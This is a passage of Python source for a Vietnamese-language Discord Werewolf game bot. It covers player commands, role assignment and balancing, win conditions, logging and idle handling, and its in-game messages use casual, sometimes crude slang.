not in session[1] or not session[1][message.author.id][0]: return if 'gunner' not in get_role(message.author.id, 'templates'): try: await client.send_message(message.author, "Ảo tướng sức mạnh?. :joy:") except discord.Forbidden: pass return if not session[2]: try: await client.send_message(message.author, "Bạn chỉ có thể bắn vào ban ngày.") except: pass finally: return msg = '' pm = False ded = None if session[1][message.author.id][4].count('bullet') < 1: msg = "Chú éo còn đạn." 
        pm = True
    else:
        if parameters == "":
            msg = commands['shoot'][2].format(BOT_PREFIX)
            pm = True
        else:
            target = get_player(parameters.split(' ')[0])
            if not target:
                target = get_player(parameters)
            if not target:
                msg = 'Không tìm thấy người chơi {}'.format(parameters)
            elif target == message.author.id:
                msg = "Cầm súng ngược kìa! :joy:"
            elif not session[1][target][0]:
                msg = "Người chơi **{}** chết rồi!".format(get_name(target))
            else:
                wolf = get_role(message.author.id, 'role') in WOLFCHAT_ROLES
                session[1][message.author.id][4].remove('bullet')
                outcome = ''
                if wolf:
                    if get_role(target, 'role') in WOLFCHAT_ROLES:
                        outcome = 'miss'
                else:
                    if get_role(target, 'role') in ACTUAL_WOLVES:
                        if get_role(target, 'role') in ['werekitten']:
                            outcome = random.choice(['suicide'] * GUNNER_SUICIDE + ['miss'] * (GUNNER_MISS + GUNNER_HEADSHOT + GUNNER_INJURE))
                        else:
                            outcome = 'killwolf'
                if outcome == '':
                    outcome = random.choice(['miss'] * GUNNER_MISS + ['suicide'] * GUNNER_SUICIDE \
                              + ['killvictim'] * GUNNER_HEADSHOT + ['injure'] * GUNNER_INJURE)
                if outcome in ['injure', 'killvictim', 'killwolf']:
                    msg = "**{}** đã bắn **{}** bằng 1 viên đạn bạc! :scream:\n\n".format(get_name(message.author.id), get_name(target))
                if outcome == 'miss':
                    msg += "**{}** đéo biết cách cầm súng và bắn trượt! :joy:".format(get_name(message.author.id))
                elif outcome == 'killwolf':
                    msg += "**{}** là **{}** đã bị bắn toét óc bởi viên đạn bạc! :joy:".format(get_name(target), get_role(target, 'death'))
                    ded = target
                elif outcome == 'suicide':
                    msg += "Trời đụ! **{}** bảo trì súng éo tốt và súng nổ banh mặt bạn ấy rồi! :joy: ".format(get_name(message.author.id))
                    msg += "Dân làng tiếc thương một **{}**. :cry:".format(get_role(message.author.id, 'death'))
                    ded = message.author.id
                elif outcome == 'killvictim':
                    msg += "**{}** là **{}** và đã chết vì viên đạn bạc. Làng đã giết nhầm! :cry:".format(
                        get_name(target), get_role(target, 'death'))
                    ded = target
                elif outcome == 'injure':
                    msg += "**{}** là một dân đen và đã bị thương. :cry: May thay vết thương nhẹ và sẽ lành vào sáng hôm sau. :smiley:".format(
                        get_name(target))
                    session[1][target][4].append('injured')
                else:
                    msg += "Cái đéo? 
(đây là 1 lỗi, hãy báo cho Lucifer)" await log(1, "{} ({}) SHOOT {} ({}) WITH OUTCOME {}".format(get_name(message.author.id), message.author.id, get_name(target), target, outcome)) if pm: target = message.author else: target = client.get_channel(GAME_CHANNEL) try: await client.send_message(target, msg) except discord.Forbidden: pass if ded: session[1][ded][0] = False member = client.get_server(WEREWOLF_SERVER).get_member(ded) if member: await client.remove_roles(member, PLAYERS_ROLE) await check_traitor() @cmd('fsay', [1, 1], "```\n{0}fsay <message>\n\nSends <message> to the lobby channel.```") async def cmd_fsay(message, parameters): if parameters: await client.send_message(client.get_channel(GAME_CHANNEL), parameters) await log(2, "{} ({}) FSAY {}".format(message.author.name, message.author.id, parameters)) else: await reply(message, commands['fsay'][2].format(BOT_PREFIX)) @cmd('observe', [2, 0], "```\n{0}observe <player>\n\nNếu bạn là Werecrow, cho bạn biết rằng <player> có ở trên giường hay không.```" "Nếu là pháp sư, cho biết nếu <player> có năng lực đặc biệt hay không VD:(seer, etc.).```") async def cmd_observe(message, parameters): if not session[0] or message.author.id not in session[1] or get_role(message.author.id, 'role') not in COMMANDS_FOR_ROLE['observe'] or not session[1][message.author.id][0]: return if session[2]: await reply(message, "Bạn chỉ có thể quan sát vào buổi tối.") return if get_role(message.author.id, 'role') == 'werecrow': if 'observe' in session[1][message.author.id][4]: await reply(message, "You are already observing someone!.") else: if parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: player = get_player(parameters) if player: if player == message.author.id: await reply(message, "That would be a waste.") elif player in [x for x in session[1] if roles[get_role(x, 'role')][0] == 'wolf' and get_role(x, 'role') != 'cultist']: await reply(message, "Observing another wolf is a waste of time.") elif not session[1][player][0]: await reply(message, "Player **" + get_name(player) + "** is dead!") else: session[1][message.author.id][4].append('observe') await reply(message, "You transform into a large crow and start your flight to **{0}'s** house. 
You will " "return after collecting your observations when day begins.".format(get_name(player))) await wolfchat("**{}** is observing **{}**.".format(get_name(message.author.id), get_name(player))) await log(1, "{0} ({1}) OBSERVE {2} ({3})".format(get_name(message.author.id), message.author.id, get_name(player), player)) while not session[2] and win_condition() == None and session[0]: await asyncio.sleep(0.1) if 'observe' in session[1][message.author.id][4]: session[1][message.author.id][4].remove('observe') if get_role(player, 'role') in ['seer', 'harlot', 'hunter']\ and session[1][player][2] in set(session[1]) - set(player)\ or get_role(player, 'role') in ['shaman', 'crazed shaman']\ and session[1][player][2] in session[1]: msg = "not in bed all night" else: msg = "sleeping all night long" try: await client.send_message(message.author, "As the sun rises, you conclude that **{}** was {}, and you fly back to your house.".format( get_name(player), msg)) except discord.Forbidden: pass else: await reply(message, "Could not find player " + parameters) elif get_role(message.author.id, 'role') == 'sorcerer': if session[1][message.author.id][2]: await reply(message, "You have already used your power.") elif parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: player = get_player(parameters) if player: if player == message.author.id: await reply(message, "Rảnh háng quá.") elif player in [x for x in session[1] if roles[get_role(x, 'role')][0] == 'wolf' and get_role(x, 'role') != 'cultist']: await reply(message, "Đi rình 1 con sói là 1 điêu thật rảnh háng.") elif player in [x for x in session[1] if not session[1][x][0]]: await reply(message, "Người chơi **" + get_name(player) + "** chết rồi!") else: session[1][message.author.id][2] = player target_role = get_role(player, 'role') if target_role in ['seer', 'oracle', 'augur']: debug_msg = target_role msg = "**{}** là một **{}**!".format(get_name(player), get_role(player, 'role')) else: debug_msg = "là người bình thường" msg = "**{}** không có khả năng đặc biệt.".format(get_name(player)) await wolfchat("**{}** đang theo dõi **{}**.".format(get_name(message.author.id), get_name(player))) await reply(message, "Sau khi thực thi nghi lễ, bạn nhận thấy " + msg) await log(1, "{0} ({1}) OBSERVE {2} ({3}) AS {4}".format(get_name(message.author.id), message.author.id, get_name(player), player, debug_msg)) else: await reply(message, "Không tìm thấy người chơi " + parameters) @cmd('id', [2, 0], "```\n{0}id <player>\n\nNếu bạn là thám tử, điều tra <player> vào ban ngày.```") async def cmd_id(message, parameters): if not session[0] or message.author.id not in session[1] or get_role(message.author.id, 'role') not in COMMANDS_FOR_ROLE['id'] or not session[1][message.author.id][0]: return if not session[2]: await reply(message, "Bạn chỉ có thể điều tra vào buổi sáng.") return if 'investigate' in session[1][message.author.id][4]: await reply(message, "Bạn đang có 1 cuộc điều tra đang tiến hành rồi.") else: if parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: player = get_player(parameters) if player: if player == message.author.id: await reply(message, "Rảnh háng quá đi điều tra chính mình -_-.") elif not session[1][player][0]: await reply(message, "Người chơi **" + get_name(player) + "** chết rồi!") else: session[1][message.author.id][4].append('investigate') await reply(message, "Kết quả của cuộc điều tra đã được đưa về. 
**{}** chính là **{}**!".format( get_name(player), get_role(player, 'role'))) await log(1, "{0} ({1}) INVESTIGATE {2} ({3})".format(get_name(message.author.id), message.author.id, get_name(player), player)) if random.random() < DETECTIVE_REVEAL_CHANCE: await wolfchat("Ai đó tình cờ làm rơi 1 số giấy tờ, nó cho biết **{}** chính là thám tử! :scream:".format(get_name(message.author.id))) await log(1, "{0} ({1}) DETECTIVE REVEAL".format(get_name(message.author.id), message.author.id)) while session[2] and win_condition() == None and session[0]: await asyncio.sleep(0.1) if 'investigate' in session[1][message.author.id][4]: session[1][message.author.id][4].remove('investigate') else: await reply(message, "Không tìm thấy người chơi " + parameters) @cmd('frevive', [1, 2], "```\n{0}frevive <player>\n\nRevives <player>. Xài để gỡ lỗi.```") async def cmd_frevive(message, parameters): if not session[0]: return if parameters == "": await reply(message, commands['frevive'][2].format(BOT_PREFIX)) else: player = get_player(parameters) if player: if session[1][player][0]: await reply(message, "Người chơi **{}** vẫn còn sống!".format(player)) else: session[1][player][0] = True await reply(message, ":thumbsup:") else: await reply(message, "Không tìm thấy người chơi {}".format(parameters)) @cmd('pass', [2, 0], "```\n{0}pass không cần thêm cú pháp\n\nChọn không làm việc hôm nay.```") async def cmd_pass(message, parameters): role = get_role(message.author.id, 'role') if not session[0] or message.author.id not in session[1] or role not in COMMANDS_FOR_ROLE['pass'] or not session[1][message.author.id][0]: return if session[2] and role in ('harlot', 'hunter'): await reply(message, "Bạn chỉ có thể xài bỏ qua vào ban đêm.") return if session[1][message.author.id][2] != '': return if role == 'harlot': session[1][message.author.id][2] = message.author.id await reply(message, "Bạn đã chọn ở nhà hôm nay.:zzz:") elif role == 'hunter': session[1][message.author.id][2] = message.author.id await reply(message, "Bạn đã chọn éo giết ai hôm nay.:joy:") else: await reply(message, "Cái đéo? 
(đây là 1 lỗi; hãy báo cho Lucifer") await log(1, "{0} ({1}) PASS".format(get_name(message.author.id), message.author.id)) ######### END COMMANDS ############# def has_privileges(level, message): if message.author.id == OWNER_ID: return True elif level == 1 and message.author.id in ADMINS: return True elif level == 0: return True else: return False async def reply(message, text): await client.send_message(message.channel, message.author.mention + ', ' + str(text)) async def parse_command(commandname, message, parameters): await log(0, 'Parsing command ' + commandname + ' with parameters `' + parameters + '` from ' + message.author.name + ' (' + message.author.id + ')') if commandname in commands: pm = 0 if message.channel.is_private: pm = 1 if has_privileges(commands[commandname][1][pm], message): try: await commands[commandname][0](message, parameters) except Exception: traceback.print_exc() print(session) msg = '```py\n{}\n```\n**session:**```py\n{}\n```'.format(traceback.format_exc(), session) await log(3, msg) await client.send_message(message.channel, "Có lỗi xảy ra và đã được ghi nhận.") elif has_privileges(commands[commandname][1][0], message): if session[0] and message.author.id in [x for x in session[1] if session[1][x][0]]: if commandname in COMMANDS_FOR_ROLE and (get_role(message.author.id, 'role') in COMMANDS_FOR_ROLE[commandname]\ or not set(get_role(message.author.id, 'templates')).isdisjoint(set(COMMANDS_FOR_ROLE[commandname]))): await reply(message, "Please use command " + commandname + " in channel.") elif has_privileges(commands[commandname][1][1], message): if session[0] and message.author.id in [x for x in session[1] if session[1][x][0]]: if commandname in COMMANDS_FOR_ROLE and get_role(message.author.id, 'role') in COMMANDS_FOR_ROLE[commandname]: try: await client.send_message(message.author, "Hãy xài lệnh " + commandname + " trong tin nhắn riêng với bot.") except discord.Forbidden: pass elif message.author.id in ADMINS: await reply(message, "Hãy xài lệnh " + commandname + " trong phần tin nhắn riêng với bot.") else: await log(2, 'User ' + message.author.name + ' (' + message.author.id + ') tried to use command ' + commandname + ' with parameters `' + parameters + '` without permissions!') async def log(loglevel, text): # loglevels # 0 = DEBUG # 1 = INFO # 2 = WARNING # 3 = ERROR levelmsg = {0 : '[DEBUG] ', 1 : '[INFO] ', 2 : '**[WARNING]** ', 3 : '**[ERROR]** <@' + OWNER_ID + '> ' } logmsg = levelmsg[loglevel] + str(text) with open(LOG_FILE, 'a', encoding='utf-8') as f: f.write("[{}] {}\n".format(datetime.now(), logmsg)) if loglevel >= MIN_LOG_LEVEL: await client.send_message(client.get_channel(DEBUG_CHANNEL), logmsg) def balance_roles(massive_role_list, default_role='villager', num_players=-1): if num_players == -1: num_players = len(session[1]) extra_players = num_players - len(massive_role_list) if extra_players > 0: massive_role_list += [default_role] * extra_players return (massive_role_list, "Không có đủ vai; Đã thêm {} {} vào danh sách vai".format(extra_players, default_role)) elif extra_players < 0: random.shuffle(massive_role_list) removed_roles = [] team_roles = [0, 0, 0] for role in massive_role_list: if role in WOLF_ROLES_ORDERED: team_roles[0] += 1 elif role in VILLAGE_ROLES_ORDERED: team_roles[1] += 1 elif role in NEUTRAL_ROLES_ORDERED: team_roles[2] += 1 for i in range(-1 * extra_players): team_fractions = list(x / len(massive_role_list) for x in team_roles) roles_to_remove = set() if team_fractions[0] > 0.35: roles_to_remove |= set(WOLF_ROLES_ORDERED) 
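            # Balancing heuristic: a team whose share of the role list exceeds
            # its cap (wolves 35%, village 70% and neutrals 15%, checked here
            # and just below) becomes a removal candidate, while teams under
            # their floors (25% / 50% / 5%) are protected; one random role from
            # a candidate team is dropped per iteration until the list fits the
            # player count.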
if team_fractions[1] > 0.7: roles_to_remove |= set(VILLAGE_ROLES_ORDERED) if team_fractions[2] > 0.15: roles_to_remove |= set(NEUTRAL_ROLES_ORDERED) if len(roles_to_remove) == 0: roles_to_remove = set(roles) if team_fractions[0] < 0.25: roles_to_remove -= set(WOLF_ROLES_ORDERED) if team_fractions[1] < 0.5: roles_to_remove -= set(VILLAGE_ROLES_ORDERED) if team_fractions[2] < 0.05: roles_to_remove -= set(NEUTRAL_ROLES_ORDERED) if len(roles_to_remove) == 0: roles_to_remove = set(roles) for role in massive_role_list[:]: if role in roles_to_remove: massive_role_list.remove(role) removed_roles.append(role) break return (massive_role_list, "Có quá nhiều vai!; Đã xóa {} khỏi danh sách vai".format(', '.join(sort_roles(removed_roles)))) return (massive_role_list, '') async def assign_roles(gamemode): massive_role_list = [] gamemode_roles = get_roles(gamemode, len(session[1])) if not gamemode_roles: # Second fallback just in case gamemode_roles = get_roles('default', len(session[1])) session[6] = 'default' # Generate list of roles for role in gamemode_roles: if role in roles and role not in TEMPLATES_ORDERED: massive_role_list += [role] * gamemode_roles[role] massive_role_list, debugmessage = balance_roles(massive_role_list) if debugmessage != '': await log(2, debugmessage) if session[6].startswith('roles'): session[7] = dict((x, massive_role_list.count(x)) for x in roles if x in massive_role_list) else: session[7] = dict(gamemode_roles) random.shuffle(massive_role_list) for player in session[1]: role = massive_role_list.pop() session[1][player][1] = role if role == 'hunter': session[1][player][4].append('hunterbullet') for i in range(gamemode_roles['cursed villager'] if 'cursed villager' in gamemode_roles else 0): cursed_choices = [x for x in session[1] if get_role(x, 'role') not in\ ['wolf', 'werecrow', 'seer', 'fool'] and 'cursed' not in session[1][x][3]] if cursed_choices: cursed = random.choice(cursed_choices) session[1][cursed][3].append('cursed') for i in range(gamemode_roles['gunner'] if 'gunner' in gamemode_roles else 0): if gamemode in ['chaos', 'random']: gunner_choices = [x for x in session[1] if 'gunner' not in session[1][x][3]] else: gunner_choices = [x for x in session[1] if get_role(x, 'role') not in \ WOLF_ROLES_ORDERED + NEUTRAL_ROLES_ORDERED and 'gunner' not in session[1][x][3]] if gunner_choices: pewpew = random.choice(gunner_choices) session[1][pewpew][3].append('gunner') session[1][pewpew][4] += ['bullet'] * int(GUNNER_MULTIPLIER * len(session[1]) + 1) if gamemode == 'belunga': for player in session[1]: session[1][player][4].append('belunga_totem') async def end_game(reason, winners=None): global faftergame await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.online) if not session[0]: return session[0] = False if session[2]: if session[3][1]: session[4][1] += datetime.now() - session[3][1] else: if session[3][0]: session[4][0] += datetime.now() - session[3][0] msg = "<@{}> Game kết thúc! :smiley: Đêm kéo dài **{:02d}:{:02d}**. Ngày kéo dài **{:02d}:{:02d}**. Game kéo dài **{:02d}:{:02d}**. 
\ \n{}\n\n".format('> <@'.join(sort_players(session[1])), session[4][0].seconds // 60, session[4][0].seconds % 60, session[4][1].seconds // 60, session[4][1].seconds % 60, (session[4][0].seconds + session[4][1].seconds) // 60, (session[4][0].seconds + session[4][1].seconds) % 60, reason) if not winners == None: for player in session[1]: # ALTERNATE WIN CONDITIONS if session[1][player][0] and get_role(player, 'role') == 'crazed shaman': winners.append(player) winners = sort_players(winners) if len(winners) == 0: msg += "Trận hòa!" elif len(winners) == 1: msg += "Kẻ thắng cuộc là **{}**!".format(get_name(winners[0])) elif len(winners) == 2: msg += "Kẻ thắng cuộc là **{}** và **{}**! :smiley:".format(get_name(winners[0]), get_name(winners[1])) else: msg += ":smiley: Kẻ thắng cuộc là **{}**, và **{}**!".format('**, **'.join(map(get_name, winners[:-1])), get_name(winners[-1])) await client.send_message(client.get_channel(GAME_CHANNEL), msg) await log(1, "WINNERS: {}".format(winners)) players = list(session[1]) session[3] = [0, 0] session[4] = [timedelta(0), timedelta(0)] session[6] = '' session[7] = {} perms = client.get_channel(GAME_CHANNEL).overwrites_for(client.get_server(WEREWOLF_SERVER).default_role) perms.send_messages = True await client.edit_channel_permissions(client.get_channel(GAME_CHANNEL), client.get_server(WEREWOLF_SERVER).default_role, perms) for player in players: member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.remove_roles(member, PLAYERS_ROLE) del session[1][player] # if faftergame: # !faftergame <command> [<parameters>] # faftergame.content.split(' ')[0] is !faftergame command = faftergame.content.split(' ')[1] parameters = ' '.join(faftergame.content.split(' ')[2:]) await commands[command][0](faftergame, parameters) faftergame = None def win_condition(): teams = {'village' : 0, 'wolf' : 0, 'neutral' : 0} injured_wolves = 0 for player in session[1]: if session[1][player][0]: if 'injured' in session[1][player][4]: if get_role(player, 'actualteam') == 'wolf' and session[1][player][1] != 'cultist': injured_wolves += 1 else: if session[1][player][1] == 'cultist': teams['village'] += 1 else: teams[roles[session[1][player][1]][0]] += 1 winners = [] win_team = '' win_lore = '' win_msg = '' if len([x for x in session[1] if session[1][x][0]]) == 0: win_lore = 'Tất cả mọi người đã chết. Ngôi làng bị bỏ hoang, phai tàn theo thời gian.:cry:' win_team = 'no win' elif teams['village'] + teams['neutral'] <= teams['wolf']: win_team = 'wolf' win_lore = 'Số dân khỏe mạnh còn sót lại bằng hoặc ít hơn số sói! Sói áp đảo dân làng và đã thống trị cả ngôi làng!.:skull:' elif len([x for x in session[1] if session[1][x][0] and get_role(x, 'role') in ACTUAL_WOLVES + ['traitor']]) == 0: # old version: teams['wolf'] == 0 and injured_wolves == 0: win_team = 'village' win_lore = 'Tất cả sói đã chết! 
Dân làng quyết định nướng thịt sói để ăn mừng chiến thắng cùng nhau! :thumbsup:'
    else:
        return None
    for player in session[1]:
        if get_role(player, 'actualteam') == win_team:
            winners.append(player)
    return [win_team, win_lore + '\n\n' + end_game_stats(), winners]

def end_game_stats():
    role_msg = ""
    role_dict = {}
    for role in roles:
        role_dict[role] = []
    for player in session[1]:
        if 'traitor' in session[1][player][4]:
            session[1][player][1] = 'traitor'
            session[1][player][4].remove('traitor')
        role_dict[session[1][player][1]].append(player)
        if 'cursed' in session[1][player][3]:
            role_dict['cursed villager'].append(player)
        if 'gunner' in session[1][player][3]:
            role_dict['gunner'].append(player)
    for key in sort_roles(role_dict):
        value = sort_players(role_dict[key])
        if len(value) == 0:
            pass
        elif len(value) == 1:
            role_msg += "**{}** là **{}**. ".format(key, get_name(value[0]))
        elif len(value) == 2:
            role_msg += "**{}** là **{}** và **{}**. ".format(roles[key][1], get_name(value[0]), get_name(value[1]))
        else:
            role_msg += "**{}** là **{}**, và **{}**. ".format(roles[key][1], '**, **'.join(map(get_name, value[:-1])), get_name(value[-1]))
    return role_msg

def get_name(player):
    member = client.get_server(WEREWOLF_SERVER).get_member(player)
    if member:
        return str(member.display_name)
    else:
        return str(player)

def get_player(string):
    string = string.lower()
    users = []
    discriminators = []
    nicks = []
    users_contains = []
    nicks_contains = []
    for player in session[1]:
        if string == player.lower() or string.strip('<@!>') == player:
            return player
        member = client.get_server(WEREWOLF_SERVER).get_member(player)
        if member:
            if member.name.lower().startswith(string):
                users.append(player)
            if string.strip('#') == member.discriminator:
                discriminators.append(player)
            if member.display_name.lower().startswith(string):
                nicks.append(player)
            if string in member.name.lower():
                users_contains.append(player)
            if string in member.display_name.lower():
                nicks_contains.append(player)
        elif get_name(player).lower().startswith(string):
            users.append(player)
    if len(users) == 1:
        return users[0]
    if len(discriminators) == 1:
        return discriminators[0]
    if len(nicks) == 1:
        return nicks[0]
    if len(users_contains) == 1:
        return users_contains[0]
    if len(nicks_contains) == 1:
        return nicks_contains[0]
    return None

def sort_players(players):
    fake = []
    real = []
    for player in players:
        if client.get_server(WEREWOLF_SERVER).get_member(player):
            real.append(player)
        else:
            fake.append(player)
    return sorted(real, key=get_name) + sorted(fake, key=int)

def get_role(player, level):
    # level: {team: reveal team only; actualteam: actual team; seen: what the player is seen as; death: role taking into account cursed and cultist and traitor; actual: actual role}
    ##(terminology: role = what you are, template = additional things that can be applied on top of your role)
    ##cursed, gunner, blessed, mayor, assassin are all templates
    ##so you always have exactly 1 role, but can have 0 or more templates on top of that
    ##revealing totem (and similar powers, like detective id) only reveal roles
    if player in session[1]:
        role = session[1][player][1]
        templates = session[1][player][3]
        if level == 'team':
            if roles[role][0] == 'wolf':
                if not role in ['cultist', 'traitor']:
                    return "wolf"
            return "villager"
        elif level == 'actualteam':
            return roles[role][0]
        elif level == 'seen':
            seen_role = None
            if role in ROLES_SEEN_WOLF:
                seen_role = 'wolf'
            elif session[1][player][1] in ROLES_SEEN_VILLAGER:
                seen_role = 'villager'
            else:
                seen_role = role
            for template in templates:
                if template in ROLES_SEEN_WOLF:
seen_role = 'wolf' break if template in ROLES_SEEN_VILLAGER: seen_role = 'villager' return seen_role elif level == 'death': returnstring = '' if role == 'traitor': returnstring += 'villager' else: returnstring += role return returnstring elif level == 'deathstats': returnstring = '' if role == 'traitor': returnstring += 'villager' else: returnstring += role return returnstring elif level == 'role': return role elif level == 'templates': return templates elif level == 'actual': return ' '.join(templates) + ' ' + role return None def get_roles(gamemode, players): if gamemode.startswith('roles'): role_string = ' '.join(gamemode.split(' ')[1:]) if role_string != '': gamemode_roles = {} separator = ',' if ';' in role_string: separator = ';' for role_piece in role_string.split(separator): piece = role_piece.strip() if '=' in piece: role, amount = piece.split('=') elif ':' in piece: role, amount = piece.split(':') else: return None amount = amount.strip() if amount.isdigit(): gamemode_roles[role.strip()] = int(amount) return gamemode_roles elif gamemode in gamemodes: if players in range(gamemodes[gamemode]['min_players'], gamemodes[gamemode]['max_players'] + 1): if gamemode == 'random': exit = False while not exit: exit = True available_roles = [x for x in roles if x not in TEMPLATES_ORDERED\ and x not in ('villager', 'cultist')] gamemode_roles = dict((x, 0) for x in available_roles) gamemode_roles[random.choice(ACTUAL_WOLVES)] += 1 # ensure at least 1 wolf that can kill for i in range(players - 1): gamemode_roles[random.choice(available_roles)] += 1 gamemode_roles['gunner'] = random.randrange(int(players ** 1.2 / 4)) gamemode_roles['cursed villager'] = random.randrange(int(players ** 1.2 / 3)) teams = {'village' : 0, 'wolf' : 0, 'neutral' : 0} for role in gamemode_roles: if role not in TEMPLATES_ORDERED: teams[roles[role][0]] += gamemode_roles[role] if teams['wolf'] >= teams['village'] + teams['neutral']: exit = False for role in dict(gamemode_roles): if gamemode_roles[role] == 0: del gamemode_roles[role] return gamemode_roles else: gamemode_roles = {} for role in roles: if role in gamemodes[gamemode]['roles'] and gamemodes[gamemode]['roles'][role][\ players - MIN_PLAYERS] > 0: gamemode_roles[role] = gamemodes[gamemode]['roles'][role][players - MIN_PLAYERS] return gamemode_roles return None def get_votes(totem_dict): voteable_players = [x for x in session[1] if session[1][x][0]] able_players = [x for x in voteable_players if 'injured' not in session[1][x][4]] vote_dict = {'abstain' : 0} for player in voteable_players: vote_dict[player] = 0 able_voters = [x for x in able_players if totem_dict[x] == 0] for player in able_voters: if session[1][player][2] in vote_dict: vote_dict[session[1][player][2]] += 1 if 'influence_totem' in session[1][player][4] and session[1][player][2] in vote_dict: vote_dict[session[1][player][2]] += 1 for player in [x for x in able_players if totem_dict[x] != 0]: if totem_dict[player] < 0: vote_dict['abstain'] += 1 else: for p in [x for x in voteable_players if x != player]: vote_dict[p] += 1 return vote_dict def _autocomplete(string, lst): if string in lst: return (string, 1) else: choices = [] for item in lst: if item.startswith(string): choices.append(item) if len(choices) == 1: return (choices[0], 1) else: return (choices, len(choices)) def verify_gamemode(gamemode, verbose=True): msg = '' good = True for i in range(gamemodes[gamemode]['max_players'] - gamemodes[gamemode]['min_players'] + 1): total = sum(gamemodes[gamemode]['roles'][role][i + 
gamemodes[gamemode]['min_players'] - MIN_PLAYERS] for role in gamemodes[gamemode]['roles']\ if role not in TEMPLATES_ORDERED) msg += str(total) if total != i + gamemodes[gamemode]['min_players'] and total != 0: good = False msg += ' - should be ' + str(i + gamemodes[gamemode]['min_players']) msg += '\n' msg = msg[:-1] if verbose: return msg else: return good def verify_gamemodes(verbose=True): msg = '' good = True for gamemode in sorted(gamemodes): msg += gamemode + '\n' result = verify_gamemode(gamemode) resultlist = result.split('\n') for i in range(len(resultlist)): if resultlist[i] != str(i + gamemodes[gamemode]['min_players']) and resultlist[i] != '0': msg += result good = False break else: msg += 'good' msg += '\n\n' if verbose: return msg else: return good async def wolfchat(message, author=''): if isinstance(message, discord.Message): author = message.author.id msg = message.content else: msg = str(message) member = client.get_server(WEREWOLF_SERVER).get_member(author) if member: athr = member.display_name else: athr = author for wolf in [x for x in session[1] if x != author and session[1][x][0] and session[1][x][1] in WOLFCHAT_ROLES and client.get_server(WEREWOLF_SERVER).get_member(x)]: try: pfx = "**-[:wolf:Wolfchat:wolf:]-**" if athr != '': pfx += " Tin nhắn từ **{}**".format(athr) await client.send_message(client.get_server(WEREWOLF_SERVER).get_member(wolf), "{}: {}".format(pfx, msg)) except discord.Forbidden: pass async def player_idle(message): while message.author.id in session[1] and not session[0]: await asyncio.sleep(1) while message.author.id in session[1] and session[0] and session[1][message.author.id][0]: def check(msg): if not message.author.id in session[1] or not session[1][message.author.id][0] or not session[0]: return True if msg.author.id == message.author.id and msg.channel.id == client.get_channel(GAME_CHANNEL).id: return True return False msg = await client.wait_for_message(author=message.author, channel=client.get_channel(GAME_CHANNEL), timeout=PLAYER_TIMEOUT, check=check) if msg == None and message.author.id in session[1] and session[0] and session[1][message.author.id][0]: await client.send_message(client.get_channel(GAME_CHANNEL), message.author.mention + "**, Bạn đã treo máy hơi lâu rồi đấy. Nói gì trong chat đi nếu không bạn sẽ bị tuyên bố đã chết!.:scream:**") try: await client.send_message(message.author, "**Bạn đã treo máy trong #" + client.get_channel(GAME_CHANNEL).name + " hơi lâu rồi đấy. 
Hãy nói gì đó trong chat nếu không bạn sẽ bị tuyên bố đã chết.:joy:**") except discord.Forbidden: pass msg = await client.wait_for_message(author=message.author, channel=client.get_channel(GAME_CHANNEL), timeout=PLAYER_TIMEOUT2, check=check) if msg == None and message.author.id in session[1] and session[0] and session[1][message.author.id][0]: await client.send_message(client.get_channel(GAME_CHANNEL), "**" + get_name(message.author.id) + "** Ngủ say như chết và.....chết thật :v.:joy: " "Kẻ còn sống đã chôn **" + get_role(message.author.id, 'death') + '**.') if message.author.id in stasis: stasis[message.author.id] += QUIT_GAME_STASIS else: stasis[message.author.id] = QUIT_GAME_STASIS session[1][message.author.id][0] = False try: await client.remove_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), PLAYERS_ROLE) except: pass await check_traitor() # await log(1, "{} ({}) IDLE OUT".format(message.author.display_name, message.author.id)) def is_online(user_id): member = client.get_server(WEREWOLF_SERVER).get_member(user_id) if member: if member.status in [discord.Status.online, discord.Status.idle]: return True return False async def check_traitor(): if not session[0] and win_condition() == None: return for other in [session[1][x][4] for x in session[1]]: if 'traitor' in other: # traitor already turned return wolf_team_alive = [x for x in session[1] if session[1][x][0] and get_role(x, 'role') in [ 'wolf', 'werecrow', 'werekitten', 'traitor']] wolf_team_no_traitors = [x for x in wolf_team_alive if get_role(x, 'role') != 'traitor'] if len(wolf_team_no_traitors) == 0: if len(wolf_team_alive) == 0: # no wolves alive; don't play traitor turn message return traitors = [x for x in session[1] if session[1][x][0] and get_role(x, 'role') == 'traitor'] await log(1, ', '.join(traitors) + " turned into wolf") for traitor in traitors: session[1][traitor][4].append('traitor') session[1][traitor][1] = 'wolf' member = client.get_server(WEREWOLF_SERVER).get_member(traitor) if member: try: await client.send_message(member, ":full_moon: HÚuuuuuuuuu...Bạn đã trở thành sói!\nĐã đến lúc báo thù cho những đồng đội đã chết! :smiling_imp:") except discord.Forbidden: pass await client.send_message(client.get_channel(GAME_CHANNEL), "**Dân làng khi đang ăn mừng chiến thắng, bỗng nghe 1 tiếng hú rợn người. Vẫn còn sói!! 
:scream:**") def sort_roles(role_list): role_list = list(role_list) result = [] for role in WOLF_ROLES_ORDERED + VILLAGE_ROLES_ORDERED + NEUTRAL_ROLES_ORDERED + TEMPLATES_ORDERED: result += [role] * role_list.count(role) return result async def run_game(): await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.dnd) session[0] = True session[2] = False if session[6] == '': vote_dict = {} for player in session[1]: vote = session[1][player][2] if vote in vote_dict: vote_dict[vote] += 1 elif vote != '': vote_dict[vote] = 1 for gamemode in vote_dict: if vote_dict[gamemode] >= len(session[1]) // 2 + 1: session[6] = gamemode break else: if datetime.now().date() == __import__('datetime').date(2017, 4, 1) or 'belunga' in globals(): session[6] = 'belunga' else: session[6] = 'default' for player in session[1]: session[1][player][1] = '' session[1][player][2] = '' perms = client.get_channel(GAME_CHANNEL).overwrites_for(client.get_server(WEREWOLF_SERVER).default_role) perms.send_messages = False await client.edit_channel_permissions(client.get_channel(GAME_CHANNEL), client.get_server(WEREWOLF_SERVER).default_role, perms) if not get_roles(session[6], len(session[1])): session[6] = 'default' # Fallback if invalid number of players for gamemode or invalid gamemode somehow for stasised in [x for x in stasis if stasis[x] > 0]: stasis[stasised] -= 1 await client.send_message(client.get_channel(GAME_CHANNEL), "<@{}>, Chào mừng tới Ma sói, 1 trò chơi nổi tiếng :smiley:. " "Đang dùng chế độ chơi **{}** với **{}** người chơi.\nTất cả người chơi kiểm tra tin nhắn từ tôi để có hướng dẫn.:joy: " "Nếu 